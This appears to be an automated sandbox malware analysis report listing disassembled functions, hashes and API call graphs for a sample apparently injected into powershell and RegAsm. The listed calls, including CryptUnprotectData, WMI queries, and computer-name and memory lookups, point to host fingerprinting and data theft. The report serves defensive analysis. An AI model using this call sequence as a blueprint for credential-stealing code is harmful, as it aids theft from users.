                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 523e568a00e7fb47da524e924e6bf5b8790ef97c82da2bda3e0b4dc5d0147395
                                                                          • Instruction ID: 50afa511a70d341736dcb2c814c966692ae210e1ab9c16bec5386e71f50f7222
                                                                          • Opcode Fuzzy Hash: 523e568a00e7fb47da524e924e6bf5b8790ef97c82da2bda3e0b4dc5d0147395
                                                                          • Instruction Fuzzy Hash: 0E1146B2D002498EDB24DFAAC4457AEFBF4EB88324F24841AD559B7240CB75A540CB95
                                                                          Function 04EE8918 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 512 4ee8918-4ee8987 ResumeThread 516 4ee8989-4ee898f 512->516 517 4ee8990-4ee89b5 512->517 516->517
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 4dd41d83003322dcd470ce937f40164f8478c2ae552733406829ed716c437662
                                                                          • Instruction ID: f985a3cd97e758cb3eac65ef44a0dc9b25fd5d4374ee047720641f411d2b50f9
                                                                          • Opcode Fuzzy Hash: 4dd41d83003322dcd470ce937f40164f8478c2ae552733406829ed716c437662
                                                                          • Instruction Fuzzy Hash: 041128B1D003498BDB20DFAAC4457AEFBF4EB88324F248419D559A7240CB75A540CB95
                                                                          Function 07913495 Relevance: .1, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 470cb7306f6b27dc53d0099223abe371f8ea6f5f5144bf31c2280285eefaf3e9
                                                                          • Instruction ID: a07c1ff06281c55c8724566ed7cf73bd9d2ce21d0e6cc8594c8a193aa4379ecd
                                                                          • Opcode Fuzzy Hash: 470cb7306f6b27dc53d0099223abe371f8ea6f5f5144bf31c2280285eefaf3e9
                                                                          • Instruction Fuzzy Hash: DB418BF17001198BCF1497BC88216AEBFB69FE171CB1084BED9099F341DA31D965C7A1
                                                                          Function 04A0D01D Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1780391847.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4a0d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 840c8fb998b8aeab1117c241794b928f9d04c28a5ec929d24864fe9ed8b7be61
                                                                          • Instruction ID: aedf0fce83bb1b68cc5069049631c409492c2b9ee7058e54f11f7ddc2c545131
                                                                          • Opcode Fuzzy Hash: 840c8fb998b8aeab1117c241794b928f9d04c28a5ec929d24864fe9ed8b7be61
                                                                          • Instruction Fuzzy Hash: E201F7735043009AF7104F65F8C0B66BFA8DF41324F08C41AED4E5A1C2C778A841C6B1
                                                                          Function 04A0D006 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1780391847.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4a0d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ba23296a732b5c4f9512d4943f0d7ef8ef3096b680539d481d21d54d18650b2
                                                                          • Instruction ID: d7b6f76c29f0ec2bb9a5645e4419137a33729150a6c2e9c7d8954fbf3661808c
                                                                          • Opcode Fuzzy Hash: 6ba23296a732b5c4f9512d4943f0d7ef8ef3096b680539d481d21d54d18650b2
                                                                          • Instruction Fuzzy Hash: 81015E7240E3C05EE7128B259D94B52BFA4DF53224F18C1CBD9889F1E3C2699849C772

                                                                          Non-executed Functions

                                                                          Function 07912D48 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                          • API String ID: 0-2509493698
                                                                          • Opcode ID: 769c6a92e73dbadaf7d4a66d0a83662253d625023c4b0f7104d1809202fed730
                                                                          • Instruction ID: a22ea3d9f09597a9ea885874e81237a3eb974d01b8c471e07481c1c8ebbfe4c2
                                                                          • Opcode Fuzzy Hash: 769c6a92e73dbadaf7d4a66d0a83662253d625023c4b0f7104d1809202fed730
                                                                          • Instruction Fuzzy Hash: 03514DB670430E8FCB25AB799810767BBAABFD1319F24C46FD505CB241DA31C861C791
                                                                          Function 079122D0 Relevance: 6.4, Strings: 5, Instructions: 179COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: tPdq$tPdq$$dq$$dq$$dq
                                                                          • API String ID: 0-1962496723
                                                                          • Opcode ID: 80a271680c8c4468816d581e2d36fb207fefd55e4ae09ac89684021f4d36b821
                                                                          • Instruction ID: 1aaf41f82fc6a3c6c79e9d91ed1c5cef4be25842a1965ed91026bc2d8c66eb75
                                                                          • Opcode Fuzzy Hash: 80a271680c8c4468816d581e2d36fb207fefd55e4ae09ac89684021f4d36b821
                                                                          • Instruction Fuzzy Hash: 0D517DB23082598FD7159B7DD41066BBBE9FFD1624B28847FD845CB392CA31D856C360
                                                                          Function 079111ED Relevance: 6.4, Strings: 5, Instructions: 134COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: c071125bff2c7becee432aafe38a5d549b5433f8d71c56c5089318d5b2728790
                                                                          • Instruction ID: f38b1973e5acb2cb3730d13d97d64a754a2b8dfd5da59b238150a26f78dc59ac
                                                                          • Opcode Fuzzy Hash: c071125bff2c7becee432aafe38a5d549b5433f8d71c56c5089318d5b2728790
                                                                          • Instruction Fuzzy Hash: 55415CF174510EEBCF249BB584502BEB7A9AFC5328F2488ABD651CB284EF71C461C751
                                                                          Function 07910A63 Relevance: 6.4, Strings: 5, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: 7f93df4face07bc4226e5ec0913bf6789a047159e08f96f879eca7606f65dd98
                                                                          • Instruction ID: d636c8b9d73ca724dc6a0554e0d8a617cd65029042b61ea74457e0002cba0b9a
                                                                          • Opcode Fuzzy Hash: 7f93df4face07bc4226e5ec0913bf6789a047159e08f96f879eca7606f65dd98
                                                                          • Instruction Fuzzy Hash: 933135B2B4420ECFCF248BAD841437EB7A6AFC521DB24846AC4518B281DF73C8E1C791
                                                                          Function 07910F2C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: 5496f80b58d9f9697fe930b07fa57993ecb3666b6393a77c5249aadde8111195
                                                                          • Instruction ID: 55b7037d030629d6c4ed7722b109cf00ffb7223405f1ec3825f0392b377c1f7c
                                                                          • Opcode Fuzzy Hash: 5496f80b58d9f9697fe930b07fa57993ecb3666b6393a77c5249aadde8111195
                                                                          • Instruction Fuzzy Hash: F4214CB6B0424ECFCB254A7C94932BABBA6ABD2219B24447AC511C7341DB73C8F6C751
                                                                          Function 07914E80 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $dq$$dq$$dq$$dq
                                                                          • API String ID: 0-185584874
                                                                          • Opcode ID: 56e1b4b768e2fce45103562ee27c0b2ccc34def801e7e98925be84af44ef2a26
                                                                          • Instruction ID: ab5bf9b443eb43fe63ce19b3a25a60c5ccc23cc28e05399a4d3dbbe89414bdd3
                                                                          • Opcode Fuzzy Hash: 56e1b4b768e2fce45103562ee27c0b2ccc34def801e7e98925be84af44ef2a26
                                                                          • Instruction Fuzzy Hash: 522188F131438AABDB24866E9841B27B7DE9BD871DF64C43EA909CB3D1DE71C8518321
                                                                          Function 07910308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq
                                                                          • API String ID: 0-4229963660
                                                                          • Opcode ID: 6609b45cfdfef6d63b6e362b063da82810a6acdb0f97cdbe1191a5f8ad94852b
                                                                          • Instruction ID: ba2e7271eed80a8af8b67e517dfb0e1acc6ecd4ee7c6fa90426884db2a757f6c
                                                                          • Opcode Fuzzy Hash: 6609b45cfdfef6d63b6e362b063da82810a6acdb0f97cdbe1191a5f8ad94852b
                                                                          • Instruction Fuzzy Hash: 3701D86160E3D94FD72B526D28201562F765FC351472941EBC480CF6D7CD554D8683A3

                                                                          Execution Graph

                                                                          Execution Coverage:10.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:41.6%
                                                                          Total number of Nodes:286
                                                                          Total number of Limit Nodes:26
                                                                          execution_graph 13708 40a960 13711 40a990 13708->13711 13709 40ae26 13710 439b60 RtlFreeHeap 13710->13709 13711->13709 13711->13710 13711->13711 13572 42e343 CoSetProxyBlanket 13573 43b781 13575 43b822 13573->13575 13574 43bace 13575->13574 13577 43b480 LdrInitializeThunk 13575->13577 13577->13574 13712 421020 13713 421080 13712->13713 13714 42102e 13712->13714 13718 421140 13714->13718 13716 4210fc 13716->13713 13717 41ef30 RtlAllocateHeap LdrInitializeThunk 13716->13717 13717->13713 13719 421150 13718->13719 13719->13719 13720 43d6c0 LdrInitializeThunk 13719->13720 13721 42121f 13720->13721 13722 43b720 GetForegroundWindow 13726 43d320 13722->13726 13724 43b72e GetForegroundWindow 13725 43b74e 13724->13725 13727 43d330 13726->13727 13727->13724 13728 40ce23 CoInitializeSecurity 13729 43d920 13731 43d940 13729->13731 13730 43da2e 13733 43d98e 13731->13733 13735 43b480 LdrInitializeThunk 13731->13735 13733->13730 13736 43b480 LdrInitializeThunk 13733->13736 13735->13733 13736->13730 13737 43bc65 13738 43bc90 13737->13738 13741 43bcde 13738->13741 13744 43b480 LdrInitializeThunk 13738->13744 13739 43bd6f 13741->13739 13745 43b480 LdrInitializeThunk 13741->13745 13743 43bde7 13744->13741 13745->13743 13746 40e2a9 13752 4097b0 13746->13752 13748 40e2b5 CoUninitialize 13749 40e2e0 13748->13749 13750 40e673 CoUninitialize 13749->13750 13751 40e690 13750->13751 13753 4097c4 13752->13753 13753->13748 13588 40d6d0 13590 40d760 13588->13590 13589 40d7ae 13590->13589 13592 43b480 LdrInitializeThunk 13590->13592 13592->13589 13754 4087f0 13756 4087fc 13754->13756 13755 408979 ExitProcess 13756->13755 13757 408811 GetCurrentProcessId GetCurrentThreadId 13756->13757 13758 408974 13756->13758 13760 408851 GetForegroundWindow 13757->13760 13761 40884b 13757->13761 13767 43b400 13758->13767 13762 4088d8 13760->13762 13761->13760 13762->13758 13766 40cdf0 CoInitializeEx 13762->13766 13770 43ca40 13767->13770 13769 43b405 FreeLibrary 13769->13755 13771 43ca49 13770->13771 13771->13769 13593 417e93 13597 417e98 13593->13597 13595 418066 13595->13595 13596 4180e6 13595->13596 13603 41c360 13595->13603 13597->13595 13597->13596 13599 43d6c0 13597->13599 13600 43d6e0 13599->13600 13601 43d80e 13600->13601 13615 43b480 LdrInitializeThunk 13600->13615 13601->13595 13604 41c383 13603->13604 13616 414a40 13604->13616 13615->13601 13617 414a60 13616->13617 13623 43d520 13617->13623 13619 414b7d 13619->13619 13620 43d520 LdrInitializeThunk 13619->13620 13627 439b40 13619->13627 13630 43b480 LdrInitializeThunk 13619->13630 13620->13619 13624 43d540 13623->13624 13624->13624 13625 43d66e 13624->13625 13631 43b480 LdrInitializeThunk 13624->13631 13625->13619 13632 43ca60 13627->13632 13629 439b4a RtlAllocateHeap 13629->13619 13630->13619 13631->13625 13633 43ca80 13632->13633 13633->13629 13633->13633 13634 43bf91 13636 43bef0 13634->13636 13635 43bff7 13636->13635 13639 43b480 LdrInitializeThunk 13636->13639 13638 43c01d 13639->13638 13640 439b90 13642 439bc0 13640->13642 13641 439c2e 13643 439b40 RtlAllocateHeap 13641->13643 13647 439e01 13641->13647 13642->13641 13650 43b480 LdrInitializeThunk 13642->13650 13646 439cb0 13643->13646 13649 439d3e 13646->13649 13651 43b480 LdrInitializeThunk 13646->13651 13652 439b60 13649->13652 13650->13641 13651->13649 13653 439b73 13652->13653 13654 439b75 13652->13654 13653->13647 13655 439b7a RtlFreeHeap 13654->13655 13655->13647 13772 431bb0 13773 431be5 GetSystemMetrics GetSystemMetrics 13772->13773 13774 431c28 13773->13774 13656 40ce55 13657 40ce70 13656->13657 13660 436f90 13657->13660 13659 40ceb9 13661 436fc0 CoCreateInstance 13660->13661 13663 437181 SysAllocString 13661->13663 13664 437526 13661->13664 13667 4371fe 13663->13667 13666 437536 GetVolumeInformationW 13664->13666 13674 437558 13666->13674 13668 437516 SysFreeString 13667->13668 13669 437206 CoSetProxyBlanket 13667->13669 13668->13664 13670 437226 SysAllocString 13669->13670 13671 43750c 13669->13671 13673 4372f0 13670->13673 13671->13668 13673->13673 13675 437315 SysAllocString 13673->13675 13674->13659 13678 43733c 13675->13678 13676 4374fa SysFreeString SysFreeString 13676->13671 13677 4374f0 13677->13676 13678->13676 13678->13677 13679 437380 VariantInit 13678->13679 13681 4373d0 13679->13681 13680 4374df VariantClear 13680->13677 13681->13680 13682 42c6d7 13684 42c700 13682->13684 13683 42cbd4 GetPhysicallyInstalledSystemMemory 13683->13684 13684->13683 13684->13684 13685 42bfda 13687 42c000 13685->13687 13686 42c0cb FreeLibrary 13688 42c0dd 13686->13688 13687->13686 13689 42c0ed GetComputerNameExA 13688->13689 13691 42c140 GetComputerNameExA 13689->13691 13692 42c210 13691->13692 13775 430879 13778 414a30 13775->13778 13777 43087e CoSetProxyBlanket 13778->13777 13693 42b65e 13694 42b679 13693->13694 13697 436c40 13694->13697 13698 436c4e 13697->13698 13701 436d33 13698->13701 13706 43b480 LdrInitializeThunk 13698->13706 13702 42d786 13701->13702 13703 436e1b 13701->13703 13705 43b480 LdrInitializeThunk 13701->13705 13703->13702 13707 43b480 LdrInitializeThunk 13703->13707 13705->13701 13706->13698 13707->13703 13779 40ebbc 13780 40ebc5 13779->13780 13809 4233a0 13780->13809 13782 40ebcb 13818 423a00 13782->13818 13784 40ebeb 13824 423d30 13784->13824 13786 40ec0b 13832 425920 13786->13832 13812 4233f0 13809->13812 13811 423781 GetLogicalDrives 13815 43d6c0 LdrInitializeThunk 13811->13815 13812->13812 13813 43d6c0 LdrInitializeThunk 13812->13813 13814 4235f1 13812->13814 13816 4234c6 13812->13816 13817 423797 13812->13817 13813->13814 13814->13811 13814->13814 13814->13816 13814->13817 13815->13817 13816->13782 13817->13816 13867 4215f0 13817->13867 13822 423aa0 13818->13822 13819 423c0f 13819->13819 13885 41eeb0 13819->13885 13821 423cf7 13821->13784 13822->13819 13822->13821 13889 43dfb0 13822->13889 13825 423d3e 13824->13825 13901 43dbd0 13825->13901 13827 43dfb0 3 API calls 13829 423ba0 13827->13829 13828 423cf7 13828->13786 13829->13827 13829->13828 13830 423c0f 13829->13830 13831 41eeb0 3 API calls 13830->13831 13831->13828 13833 425b80 13832->13833 13834 40ec2b 13832->13834 13837 425947 13832->13837 13842 425bc5 13832->13842 13906 43b420 13833->13906 13844 426170 13834->13844 13835 43dfb0 3 API calls 13835->13837 13837->13833 13837->13834 13837->13835 13837->13837 13840 43dbd0 LdrInitializeThunk 13837->13840 13837->13842 13838 43dbd0 LdrInitializeThunk 13838->13842 13840->13837 13842->13834 13842->13838 13843 43b480 LdrInitializeThunk 13842->13843 13915 43dcf0 13842->13915 13925 43e690 13842->13925 13843->13842 13845 426190 13844->13845 13847 4261ee 13845->13847 13939 43b480 LdrInitializeThunk 13845->13939 13846 40ec34 13854 426500 13846->13854 13847->13846 13849 439b40 RtlAllocateHeap 13847->13849 13851 426298 13849->13851 13850 439b60 RtlFreeHeap 13850->13846 13853 42630e 13851->13853 13940 43b480 LdrInitializeThunk 13851->13940 13853->13850 13853->13853 13941 426520 13854->13941 13868 43d520 LdrInitializeThunk 13867->13868 13869 421630 13868->13869 13870 439b40 RtlAllocateHeap 13869->13870 13876 42163c 13869->13876 13871 421674 13870->13871 13880 42172f 13871->13880 13882 43b480 LdrInitializeThunk 13871->13882 13872 421d28 13874 439b60 RtlFreeHeap 13872->13874 13877 421d38 13874->13877 13875 439b40 RtlAllocateHeap 13875->13880 13876->13816 13877->13876 13884 43b480 LdrInitializeThunk 13877->13884 13880->13872 13880->13875 13881 439b60 RtlFreeHeap 13880->13881 13883 43b480 LdrInitializeThunk 13880->13883 13881->13880 13882->13871 13883->13880 13884->13877 13886 41eee0 13885->13886 13886->13886 13887 4215f0 3 API calls 13886->13887 13888 41ef24 13887->13888 13888->13821 13890 43dfd0 13889->13890 13891 43e01e 13890->13891 13899 43b480 LdrInitializeThunk 13890->13899 13892 43e2ac 13891->13892 13894 439b40 RtlAllocateHeap 13891->13894 13892->13822 13896 43e09c 13894->13896 13895 439b60 RtlFreeHeap 13895->13892 13898 43e10e 13896->13898 13900 43b480 LdrInitializeThunk 13896->13900 13898->13895 13898->13898 13899->13891 13900->13898 13902 43dbf0 13901->13902 13904 43dcbf 13902->13904 13905 43b480 LdrInitializeThunk 13902->13905 13904->13829 13905->13904 13907 43b465 13906->13907 13908 43b45a 13906->13908 13909 43b438 13906->13909 13911 43b446 13906->13911 13910 439b60 RtlFreeHeap 13907->13910 13912 439b40 RtlAllocateHeap 13908->13912 13909->13907 13909->13911 13913 43b460 13910->13913 13914 43b44b RtlReAllocateHeap 13911->13914 13912->13913 13913->13842 13914->13913 13916 43dd10 13915->13916 13917 43dd5e 13916->13917 13935 43b480 LdrInitializeThunk 13916->13935 13918 43df9c 13917->13918 13920 439b40 RtlAllocateHeap 13917->13920 13918->13842 13922 43ddf1 13920->13922 13921 439b60 RtlFreeHeap 13921->13918 13924 43de6f 13922->13924 13936 43b480 LdrInitializeThunk 13922->13936 13924->13921 13926 43e69f 13925->13926 13928 43e7ee 13926->13928 13937 43b480 LdrInitializeThunk 13926->13937 13927 43ea97 13927->13842 13928->13927 13930 439b40 RtlAllocateHeap 13928->13930 13931 43e883 13930->13931 13934 43e93e 13931->13934 13938 43b480 LdrInitializeThunk 13931->13938 13932 439b60 RtlFreeHeap 13932->13927 13934->13932 13935->13917 13936->13924 13937->13928 13938->13934 13939->13847 13940->13853 13942 426560 13941->13942 13942->13942 13949 439b90 13942->13949 13946 426696 13947 4265c3 13947->13946 13963 43a3f0 13947->13963 13951 439bc0 13949->13951 13950 439c2e 13952 439b40 RtlAllocateHeap 13950->13952 13956 4265b7 13950->13956 13951->13950 13971 43b480 LdrInitializeThunk 13951->13971 13955 439cb0 13952->13955 13954 439b60 RtlFreeHeap 13954->13956 13958 439d3e 13955->13958 13972 43b480 LdrInitializeThunk 13955->13972 13959 439e30 13956->13959 13958->13954 13960 439f0e 13959->13960 13961 439e42 13959->13961 13960->13947 13961->13960 13973 43b480 LdrInitializeThunk 13961->13973 13965 43a440 13963->13965 13964 43abfe 13964->13947 13970 43a4ae 13965->13970 13974 43b480 LdrInitializeThunk 13965->13974 13967 43ab7a 13967->13964 13975 43b480 LdrInitializeThunk 13967->13975 13969 43b480 LdrInitializeThunk 13969->13970 13970->13964 13970->13967 13970->13969 13970->13970 13971->13950 13972->13958 13973->13960 13974->13970 13975->13964 13976 416b7e 13978 416b90 13976->13978 13977 416d37 CryptUnprotectData 13979 416d56 13977->13979 13978->13977

                                                                          Executed Functions

                                                                          Function 00431BB0 Relevance: 47.4, APIs: 2, Strings: 25, Instructions: 179COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 431bb0-431c9c GetSystemMetrics * 2 6 431ca3-432087 0->6
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem
                                                                          • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                          • API String ID: 4116985748-628680385
                                                                          • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                          • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                          • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                          • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86
                                                                          Function 00436F90 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 571memorycomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 9 436f90-436fb8 10 436fc0-437006 9->10 10->10 11 437008-43701f 10->11 12 437020-43705b 11->12 12->12 13 43705d-43709a 12->13 14 4370a0-4370b2 13->14 14->14 15 4370b4-4370cd 14->15 17 4370d7-4370e2 15->17 18 4370cf 15->18 19 4370f0-437122 17->19 18->17 19->19 20 437124-43717b CoCreateInstance 19->20 21 437181-4371b2 20->21 22 437526-437556 call 43ce00 GetVolumeInformationW 20->22 23 4371c0-4371d4 21->23 27 437560-437562 22->27 28 437558-43755c 22->28 23->23 25 4371d6-437200 SysAllocString 23->25 33 437516-437522 SysFreeString 25->33 34 437206-437220 CoSetProxyBlanket 25->34 29 437587-43758e 27->29 28->27 31 437590-437597 29->31 32 4375a7-4375bf 29->32 31->32 35 437599-4375a5 31->35 36 4375c0-4375d4 32->36 33->22 37 437226-43723a 34->37 38 43750c-437512 34->38 35->32 36->36 39 4375d6-43760f 36->39 40 437240-437261 37->40 38->33 41 437610-437650 39->41 40->40 42 437263-4372e3 SysAllocString 40->42 41->41 43 437652-43767f call 41dc20 41->43 44 4372f0-437313 42->44 49 437680-437688 43->49 44->44 46 437315-43733e SysAllocString 44->46 50 437344-437366 46->50 51 4374fa-43750a SysFreeString * 2 46->51 49->49 52 43768a-43768c 49->52 59 4374f0-4374f6 50->59 60 43736c-43736f 50->60 51->38 53 437692-4376a2 call 408070 52->53 54 437570-437581 52->54 53->54 54->29 55 4376a7-4376ae 54->55 59->51 60->59 61 437375-43737a 60->61 61->59 62 437380-4373c8 VariantInit 61->62 63 4373d0-4373e4 62->63 63->63 64 4373e6-4373f4 63->64 65 4373f8-4373fa 64->65 66 437400-437406 65->66 67 4374df-4374ec VariantClear 65->67 66->67 68 43740c-43741a 66->68 67->59 69 437467 68->69 70 43741c-437421 68->70 71 437469-4374a2 call 407ff0 call 408e90 69->71 72 437446-43744a 70->72 83 4374a4 71->83 84 4374a9-4374b1 71->84 73 437430-437438 72->73 74 43744c-437455 72->74 79 43743b-437444 73->79 76 437457-43745a 74->76 77 43745c-437460 74->77 76->79 77->79 80 437462-437465 77->80 79->71 79->72 80->79 83->84 85 4374b3 84->85 86 4374b8-4374db call 408020 call 408000 84->86 85->86 86->67
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                          • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                          • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                          • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                          • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                          • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                          • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                          • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                          • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                          • API String ID: 2573436264-264043890
                                                                          • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                          • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                          • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                          • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96
                                                                          Function 0040E2A9 Relevance: 14.0, APIs: 2, Strings: 7, Instructions: 529COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
